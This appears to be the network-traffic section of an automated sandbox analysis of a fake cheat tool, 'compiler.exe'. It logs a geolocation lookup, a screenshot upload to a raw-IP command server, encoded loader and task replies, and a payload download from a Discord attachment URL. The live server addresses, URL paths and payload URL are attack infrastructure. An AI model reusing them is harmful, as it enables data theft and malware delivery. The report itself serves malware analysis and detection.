                                                          Jan 12, 2024 23:13:00.101795912 CET8049735208.95.112.1192.168.2.4
                                                          Jan 12, 2024 23:13:00.103936911 CET4973580192.168.2.4208.95.112.1
                                                          Jan 12, 2024 23:13:11.479496956 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:13:11.705925941 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:13:11.921124935 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:13:11.924226999 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:13:11.985667944 CET4973580192.168.2.4208.95.112.1
                                                          Jan 12, 2024 23:13:11.985841990 CET4973880192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:13:11.985932112 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:14:09.889954090 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.117556095 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.117711067 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.133248091 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.360111952 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.406512022 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.418900967 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.646661043 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.687752008 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.727613926 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.955528975 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955594063 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955636978 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955672979 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955679893 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.955693960 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955717087 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955739975 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955841064 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:10.955866098 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.955912113 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:10.955921888 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:11.000349998 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:13.086354971 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:13.312432051 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.312484026 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.312526941 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:13.312592030 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:13.313313961 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.313348055 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.313390970 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:13.538120985 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.538181067 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.538361073 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.538463116 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.539247036 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.539283037 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.553344011 CET299754974145.15.156.186192.168.2.4
                                                          Jan 12, 2024 23:14:13.594010115 CET4974129975192.168.2.445.15.156.186
                                                          Jan 12, 2024 23:14:16.059206009 CET4974129975192.168.2.445.15.156.186

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 12, 2024 23:12:22.895302057 CET5595353192.168.2.41.1.1.1
                                                          Jan 12, 2024 23:12:22.991779089 CET53559531.1.1.1192.168.2.4
                                                          Jan 12, 2024 23:12:37.799510956 CET5947853192.168.2.41.1.1.1
                                                          Jan 12, 2024 23:12:37.895229101 CET53594781.1.1.1192.168.2.4
                                                          Jan 12, 2024 23:13:27.369075060 CET5082153192.168.2.41.1.1.1
                                                          Jan 12, 2024 23:13:27.468808889 CET53508211.1.1.1192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 12, 2024 23:12:22.895302057 CET192.168.2.41.1.1.10xd6edStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                          Jan 12, 2024 23:12:37.799510956 CET192.168.2.41.1.1.10x3c7bStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                          Jan 12, 2024 23:13:27.369075060 CET192.168.2.41.1.1.10x93f0Standard query (0)KualBsmtIVFpTexCtErDRKSXzMSbr.KualBsmtIVFpTexCtErDRKSXzMSbrA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 12, 2024 23:12:22.991779089 CET1.1.1.1192.168.2.40xd6edNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                          Jan 12, 2024 23:12:37.895229101 CET1.1.1.1192.168.2.40x3c7bNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                          Jan 12, 2024 23:12:37.895229101 CET1.1.1.1192.168.2.40x3c7bNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                          Jan 12, 2024 23:12:37.895229101 CET1.1.1.1192.168.2.40x3c7bNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                          Jan 12, 2024 23:12:37.895229101 CET1.1.1.1192.168.2.40x3c7bNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                          Jan 12, 2024 23:12:37.895229101 CET1.1.1.1192.168.2.40x3c7bNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                          Jan 12, 2024 23:13:27.468808889 CET1.1.1.1192.168.2.40x93f0Name error (3)KualBsmtIVFpTexCtErDRKSXzMSbr.KualBsmtIVFpTexCtErDRKSXzMSbrnonenoneA (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • cdn.discordapp.com
                                                          • ip-api.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449735208.95.112.1807720C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 12, 2024 23:12:23.146749973 CET164OUTGET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                                                          Content-Type: application/json
                                                          User-Agent: Winter
                                                          Host: ip-api.com
                                                          Cache-Control: no-cache
                                                          Jan 12, 2024 23:12:23.345918894 CET290INHTTP/1.1 200 OK
                                                          Date: Fri, 12 Jan 2024 22:12:23 GMT
                                                          Content-Type: application/json; charset=utf-8
                                                          Content-Length: 113
                                                          Access-Control-Allow-Origin: *
                                                          X-Ttl: 60
                                                          X-Rl: 44
                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 7d
                                                          Data Ascii: {"status":"success","countryCode":"US","city":"Washington","timezone":"America/New_York","query":"102.165.48.42"}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449737213.248.43.48807720C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 12, 2024 23:12:24.299453020 CET234OUTPUT /loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=afAkRbIGh1tq3QYsA37XbyC4j
                                                          User-Agent: Winter
                                                          Host: 213.248.43.48
                                                          Content-Length: 3933196
                                                          Cache-Control: no-cache
                                                          Jan 12, 2024 23:12:24.300579071 CET11574OUTData Raw: 2d 2d 61 66 41 6b 52 62 49 47 68 31 74 71 33 51 59 73 41 33 37 58 62 79 43 34 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                          Data Ascii: --afAkRbIGh1tq3QYsA37XbyC4jContent-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="screen.bmp"BM6($$######$$$$$$$$#
                                                          Jan 12, 2024 23:12:24.521760941 CET1286OUTData Raw: 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00
                                                          Data Ascii: vlg$$#################################
                                                          Jan 12, 2024 23:12:24.523364067 CET5144OUTData Raw: 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18
                                                          Data Ascii: ###########################""""""""""""""""""""""#####################"""###"""""
                                                          Jan 12, 2024 23:12:24.523869991 CET7716OUTData Raw: 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f
                                                          Data Ascii:
                                                          Jan 12, 2024 23:12:24.523981094 CET2572OUTData Raw: 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f
                                                          Data Ascii:
                                                          Jan 12, 2024 23:12:24.524198055 CET7716OUTData Raw: 18 00 23 18 00 23 18 00 23 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 23 18 00 23 18
                                                          Data Ascii: ###""""""""""""""""""""""######################""###"""""""""""""""""""""""""""""
                                                          Jan 12, 2024 23:12:24.744069099 CET2572OUTData Raw: 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18
                                                          Data Ascii: """""""""""""#####################"""""""""""""""""""""""""""""""""""""""""""""""
                                                          Jan 12, 2024 23:12:24.745806932 CET33436OUTData Raw: 67 1b 0a 01 1b 0a 01 1b 0a 01 1b 0a 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00
                                                          Data Ascii: g$$$$$$$$$$$$$#######$$$$$$$$$$$$$$$$$$$$$$##$$$#
                                                          Jan 12, 2024 23:12:24.746440887 CET12860OUTData Raw: 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e
                                                          Data Ascii:
                                                          Jan 12, 2024 23:12:24.965578079 CET5144OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 e7 e7 e7 08 08 08 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 2b 75 b5 b5 75 2b f2 f2 f2 f2 f2 f2
                                                          Data Ascii: +uu++Ru
                                                          Jan 12, 2024 23:12:37.681456089 CET1286INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Fri, 12 Jan 2024 22:12:37 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 2048
                                                          Connection: keep-alive
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=C1BWOqKywZReICpMxAnY0Cnvg5xs02rN0Vg01PRGSL6ctfFTIJpT5tNjVVmw3zSK9S9LlUbV%2FBNeF1R7vYqbuatPKxGWPfr%2FhUnFIhr2Rr%2F%2BCS9xeK0I6LjCYtD2WG4%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          CF-RAY: 8448bdf05da265c7-FRA
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 7b 22 6c 6f 61 64 65 72 22 3a 22 59 6a 4d 73 4e 57 49 73 5a 44 49 73 59 6d 4d 73 59 6d 59 73 4f 54 49 73 59 7a 45 73 5a 47 59 73 59 57 49 73 59 6a 59 73 5a 44 41 73 59 6d 45 73 59 6d 59 73 5a 44 55 73 59 7a 59 73 4f 57 51 73 59 6a 59 73 4f 54 59 73 4f 54 51 73 4f 47 51 73 4e 32 49 73 59 54 4d 73 4e 6a 4d 73 4e 54 59 73 4f 54 4d 73 59 6a 59 73 59 7a 55 73 5a 44 49 73 59 7a 63 73 5a 47 45 73 59 7a 59 73 4e 6a 67 73 4e 7a 49 73 4e 54 6b 73 59 54 41 73 4e 6d 59 73 4e 6d 59 73 4e 54 4d 73 59 7a 41 73 5a 44 45 73 59 6a 67 73 59 6a 4d 73 5a 54 41 73 59 7a 49 73 59 6d 51 73 59 32 59 73 4f 44 51 73 4e 7a 49 73 4e 6a 51 73 5a 57 59 73 4e 32 4d 73 5a 54 45 73 59 6a 51 73 5a 54 51 73 59 54 67 73 4e 54 59 73 4e 6d 4d 73 4e 6a 45 73 4e 32 55 73 4f 54 51 73 4f 44 45 73 4f 44 55 73 4e 32 45 73 59 6a 6b 73 59 57 4d 73 4f 57 45 73 5a 54 51 73 59 6a 67 73 59 7a 49 73 4e 54 4d 73 4f 44 67 73 4f 47 4d 73 59 6a 49 73 59 6a 4d 73 5a 44 63 73 59 7a 63 73 59 6d 59 73 5a 54 51 73 4f 47 55 73 4e 54 67 73 4e 6a 59 73 5a 54 67 73 59 6d 49 73 59 32 59 73 59 6a 63 73 5a 47 4d 73 59 6a 63 73 4e 54 59 73 4e 6d 4d 73 4e 6a 45 73 59 32 4d 73 4f 44 55 73 59 7a 6b 73 59 32 45 73 5a 44 41 73 59 6d 45 73 4e 57 45 73 4e 7a 4d 73 4f 54 41 73 4e 6a 55 73 4f 54 41 73 4f 57 59 73 4e 6d 55 73 5a 44 45 73 59 6d 55 73 59 7a 51 73 5a 47 45 73 59 7a 59 73 4e 32 45 73 5a 44 59 73 59 7a 55 73 4f 57 49 73 59 6a 6b 73 5a 54 59 73 59 32 4d 73 5a 44 49 73 59 57 59 73 4f 54 6b 73 4e 6d 59 73 4e 54 51 73 4e 54 51 73 59 6a 51 73 59 7a 55 73 59 7a 51 73 59 7a 6b 73 5a 47 45 73 59 32 49 73 4e 6a 67 73 4e 7a 49 73 4e 54 6b 73 5a 44 59 73 59 54 51 73 59 6d 49 73 59 54 51 73 59 6a 4d 73 5a 54 6b 73 4e 7a 67 73 4e 7a 49 73 4f 47 51 73 59 6d 4d 73 59 7a 4d 73 59 32 49 73 59 7a 63 73 4e 57 45 73 4e 32 55 73 4f 54 51 73 4f 47 45 73 4f 54 6b 73 4e 6d 49 73 4f 54 6b 73 59 6a 4d 73 4f 54 6b 73 59 54 51 73 59 6a 51 73 59 6d 45 73 5a 44 59 73 59 7a 6b 73 59 32 45 73 59 7a 59 73 59 54 6b 73 4f 57 51 73 4e 57 49 73 59 57 45 73 4e 6a 4d 73 4f 44 41 73 59 57 55 73 22 2c 22 74 61 73 6b 73 22 3a 22 4f 54 4d 73 59 6a 51 73 4f 54 49 73 59 57 4d 73 59 6a 4d 73 4e 54 4d 73 4f 44
                                                          Data Ascii: {"loader":"YjMsNWIsZDIsYmMsYmYsOTIsYzEsZGYsYWIsYjYsZDAsYmEsYmYsZDUsYzYsOWQsYjYsOTYsOTQsOGQsN2IsYTMsNjMsNTYsOTMsYjYsYzUsZDIsYzcsZGEsYzYsNjgsNzIsNTksYTAsNmYsNmYsNTMsYzAsZDEsYjgsYjMsZTAsYzIsYmQsY2YsODQsNzIsNjQsZWYsN2MsZTEsYjQsZTQsYTgsNTYsNmMsNjEsN2UsOTQsODEsODUsN2EsYjksYWMsOWEsZTQsYjgsYzIsNTMsODgsOGMsYjIsYjMsZDcsYzcsYmYsZTQsOGUsNTgsNjYsZTgsYmIsY2YsYjcsZGMsYjcsNTYsNmMsNjEsY2MsODUsYzksY2EsZDAsYmEsNWEsNzMsOTAsNjUsOTAsOWYsNmUsZDEsYmUsYzQsZGEsYzYsN2EsZDYsYzUsOWIsYjksZTYsY2MsZDIsYWYsOTksNmYsNTQsNTQsYjQsYzUsYzQsYzksZGEsY2IsNjgsNzIsNTksZDYsYTQsYmIsYTQsYjMsZTksNzgsNzIsOGQsYmMsYzMsY2IsYzcsNWEsN2UsOTQsOGEsOTksNmIsOTksYjMsOTksYTQsYjQsYmEsZDYsYzksY2EsYzYsYTksOWQsNWIsYWEsNjMsODAsYWUs","tasks":"OTMsYjQsOTIsYWMsYjMsNTMsOD
                                                          Jan 12, 2024 23:13:11.479496956 CET276OUTPUT /task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
                                                          Content-Type: application/json
                                                          User-Agent: Winter
                                                          Host: 213.248.43.48
                                                          Content-Length: 95
                                                          Cache-Control: no-cache
                                                          Data Raw: 7b 22 64 61 74 61 22 3a 22 59 57 4d 73 4f 57 45 73 5a 54 4d 73 59 57 55 73 4f 54 67 73 4f 54 55 73 4f 47 49 73 59 54 4d 73 4f 44 41 73 4f 44 51 73 4f 54 45 73 59 6a 63 73 59 7a 6b 73 5a 47 4d 73 5a 44 41 73 59 57 4d 73 59 6a 59 73 5a 57 51 73 4f 54 63 73 59 7a 49 73 4f 57 55 3d 22 7d
                                                          Data Ascii: {"data":"YWMsOWEsZTMsYWUsOTgsOTUsOGIsYTMsODAsODQsOTEsYjcsYzksZGMsZDAsYWMsYjYsZWQsOTcsYzIsOWU="}
                                                          Jan 12, 2024 23:13:11.921124935 CET524INHTTP/1.1 204 No Content
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Fri, 12 Jan 2024 22:13:11 GMT
                                                          Connection: keep-alive
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7r5d9KUEQJeQd72uiXGzEGx9jMRr0ZBCkFCB63etSU6Sxmvg8o1AGbya08HnpbvufekouoHFw2sS6yOhENReympF4LY8J%2F0yoTSWRYji2Szaj%2Fq82QBwl60O7CY4eP0%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          CF-RAY: 8448becbea84b987-AMS
                                                          alt-svc: h3=":443"; ma=86400


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.449738162.159.130.233807720C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 12, 2024 23:12:37.991643906 CET174OUTGET /attachments/1194585859404599367/1194585905420320788/2 HTTP/1.1
                                                          Content-Type: application/json
                                                          User-Agent: Winter
                                                          Host: cdn.discordapp.com
                                                          Cache-Control: no-cache
                                                          Jan 12, 2024 23:12:38.102488995 CET1166INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 12 Jan 2024 22:12:38 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=3600
                                                          Expires: Fri, 12 Jan 2024 23:12:38 GMT
                                                          Location: https://cdn.discordapp.com/attachments/1194585859404599367/1194585905420320788/2
                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                          Set-Cookie: __cf_bm=NQ8hsNROJ4ECPUpzUwnJbG9uTPemeuU4i_wUYe2S75I-1705097558-1-AePzRORzeAr0iGC0qs1nWkncA+Psk0Y78fhnqrbDbP9Mw6fKoc9CI0A1E5NudBf115BY9/I6p8WSeSfkX3sogw4=; path=/; expires=Fri, 12-Jan-24 22:42:38 GMT; domain=.discordapp.com; HttpOnly; SameSite=None
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mLJmWaCT2QWk3sir2Xohl0yWbVug1aBYwejXNyjHKWJuYsgpbNubjd7g8GS9NshhySetRhL7Ri7LDVH9N1Re%2BiFKNbh5vO1i8M1xMT54lcrsHNH%2BBOLRIHnAIit0go3TFNF8Iw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Set-Cookie: _cfuvid=Gm5WzVXIL6HX9Y_BYTeLwclnnr06fyZHUxgDMI2R4MA-1705097558055-0-604800000; path=/; domain=.discordapp.com; HttpOnly
                                                          Server: cloudflare
                                                          CF-RAY: 8448bdf9cf703958-IAD
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449739162.159.130.2334437720C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-12 22:12:38 UTC408OUTGET /attachments/1194585859404599367/1194585905420320788/2 HTTP/1.1
                                                          User-Agent: Winter
                                                          Cache-Control: no-cache
                                                          Host: cdn.discordapp.com
                                                          Connection: Keep-Alive
                                                          Cookie: __cf_bm=NQ8hsNROJ4ECPUpzUwnJbG9uTPemeuU4i_wUYe2S75I-1705097558-1-AePzRORzeAr0iGC0qs1nWkncA+Psk0Y78fhnqrbDbP9Mw6fKoc9CI0A1E5NudBf115BY9/I6p8WSeSfkX3sogw4=; _cfuvid=Gm5WzVXIL6HX9Y_BYTeLwclnnr06fyZHUxgDMI2R4MA-1705097558055-0-604800000
                                                          2024-01-12 22:12:38 UTC1275INHTTP/1.1 200 OK
                                                          Date: Fri, 12 Jan 2024 22:12:38 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 3182723
                                                          Connection: close
                                                          CF-Ray: 8448bdfccd001fec-IAD
                                                          CF-Cache-Status: MISS
                                                          Accept-Ranges: bytes, bytes
                                                          Cache-Control: public, max-age=31536000
                                                          Content-Disposition: attachment; filename="2"
                                                          ETag: "376559befaa721cb4b27d1bf5d7ca956"
                                                          Expires: Sat, 11 Jan 2025 22:12:38 GMT
                                                          Last-Modified: Wed, 10 Jan 2024 10:17:54 GMT
                                                          Vary: Accept-Encoding
                                                          Alt-Svc: h3=":443"; ma=86400
                                                          x-goog-generation: 1704881874322584
                                                          x-goog-hash: crc32c=1FbHjQ==
                                                          x-goog-hash: md5=N2VZvvqnIctLJ9G/XXypVg==
                                                          x-goog-metageneration: 1
                                                          x-goog-storage-class: STANDARD
                                                          x-goog-stored-content-encoding: identity
                                                          x-goog-stored-content-length: 3182723
                                                          X-GUploader-UploadID: ABPtcPrYI9rhMgY1Fmg3mwKl9xO8JVSrWhXD6dLO2OPTWSnMu__njO4EOYiIacjE4SzmM5b65aRDfxFbXw
                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B7rwoeLqiHy6xxlY0cVYhaMqlaKXxLNKMQ7cpU6kMCWdRGzGD1SMFhQG%2Fj7TamajB%2F0GBeg5ivX4CqJNQU%2BBrmkHM53gH7TmVOT163V5EfACLf%2FEqy%2BMHcApZj1d3pm7PavbtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          2024-01-12 22:12:38 UTC1369INData Raw: 38 35 2c 39 33 2c 64 30 2c 34 33 2c 35 30 2c 33 31 2c 34 65 2c 36 63 2c 35 30 2c 35 32 2c 36 62 2c 35 34 2c 31 35 39 2c 31 36 36 2c 36 32 2c 33 38 2c 66 63 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 37 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 36 2c 35 38 2c 34 36 2c 34 36 2c 35 38 2c 31 32 61 2c 35 31 2c 34 66 2c 65 35 2c 35 37 2c 31 33 39 2c 36 64 2c 31 30 61 2c 36 63 2c 61 30 2c 31 32 37 2c 38 38 2c 62 34 2c 39 64 2c 62 35 2c 65 39 2c 63 33 2c
                                                          Data Ascii: 85,93,d0,43,50,31,4e,6c,50,52,6b,54,159,166,62,38,fc,74,5a,6d,4b,77,43,34,72,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,66,58,46,46,58,12a,51,4f,e5,57,139,6d,10a,6c,a0,127,88,b4,9d,b5,e9,c3,
                                                          2024-01-12 22:12:38 UTC1369INData Raw: 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 62 34 2c 31 32 34 2c 36 64 2c 35 34 2c 39 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 61 31 2c 35 33 2c 36 33 2c 31 30 31 2c 36 38 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 36 30 2c 62 35 2c 62 36 2c 64 62 2c 63 39 2c 36 35 2c 35 38 2c 34 36 2c 31 32 39 2c 37 39 2c 37 32 2c 34 33 2c 34 66 2c 34 31 2c 34 65 2c 36 63 2c 34 63 2c 39 34
